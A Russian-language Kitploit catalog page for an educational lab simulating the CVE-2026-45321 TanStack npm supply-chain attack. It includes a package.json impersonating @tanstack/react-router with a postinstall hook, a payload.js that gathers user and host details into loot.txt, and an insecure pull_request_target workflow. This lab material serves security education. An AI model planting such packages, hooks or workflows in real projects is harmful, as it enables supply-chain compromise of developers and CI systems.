Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-45321-Tanstack | Kitploit
Инструменты/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
Анализ уязвимостейАнализ вредоносных программБезопасность Цепочки ПоставокОбучение и ОбразованиеЛаборатории и Практика
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
2 месяцев назадЕщё не проверено

Симуляция атаки на цепочку поставок — CVE-2026-45321 (TanStack)

Образовательная лаборатория для понимания атак на цепочку поставок npm, злоупотреблений CI/CD и выполнения кода во время установки

Отказ от ответственности

Этот проект создан только для:

  • изучения кибербезопасности,
  • исследований в области defensive security,
  • симуляции локальной лаборатории,
  • понимания концепции атаки на цепочку поставок.

Не используйте этот проект для:

  • атак на реальные системы,
  • кражи учётных данных,
  • развёртывания вредоносного ПО,
  • несанкционированного доступа,
  • или любых других незаконных действий.

Описание

Эта лаборатория моделирует основные концепции инцидента:

  • CVE-2026-45321
  • Компрометация цепочки поставок npm TanStack
  • Злоупотребление CI/CD GitHub Actions
  • Выполнение скриптов жизненного цикла npm

Симуляция выполняется локально и безопасно, без:

  • реального хищения учётных данных,
  • экфильтрации токенов,
  • или компрометации сторонних сервисов.

Структура лаборатории

root@kitploit:~
lab/
├── fake-repo/          # Simulasi repository target
├── attacker-package/   # Simulasi package malicious
└── victim-project/     # Simulasi korban

Как работает симуляция

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall script berjalan
        ↓
payload.js dieksekusi otomatis
        ↓
Korban terkena install-time execution

Изучаемые концепции

  • хуки жизненного цикла npm
  • выполнение произвольного кода во время установки
  • атака на цепочку поставок
  • граница доверия CI/CD
  • вредоносный npm-пакет
  • злоупотребление postinstall-скриптами
  • компрометация зависимостей

Установка

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Настройка пакета атакующего

2. Переход в папку пакета атакующего

root@kitploit:~
cd attacker-package

3. Установка зависимостей

root@kitploit:~
npm install

4. Сборка tarball-пакета

root@kitploit:~
npm pack

Результат:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Симуляция жертвы

5. Переход в проект жертвы

root@kitploit:~
cd ../victim-project

6. Установка вредоносного пакета

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Вывод

При успешном выполнении появится:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

и файл:

root@kitploit:~
loot.txt

будет создан автоматически.


Пример payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Пример package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Симуляция CI/CD

Этот проект также можно использовать для понимания:

  • GitHub Actions
  • pull_request_target
  • границы привилегий CI/CD
  • выполнения зависимостей

Пример workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Связь с CVE-2026-45321

Лабораторная симуляцияРеальный мир
attacker-packageскомпрометированный пакет TanStack
payload.jsвредоносный установщик

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Только в образовательных целях

Эта лаборатория создана для повышения осведомлённости о:

  • безопасности цепочки поставок,
  • безопасности зависимостей,
  • безопасности CI/CD,
  • и исследованиях в области defensive security.
Скачать инструмент
postinstallзлоупотребление хуком жизненного цикла
victim-projectразработчик/CI (жертва)
fake-repoпайплайн GitHub Actions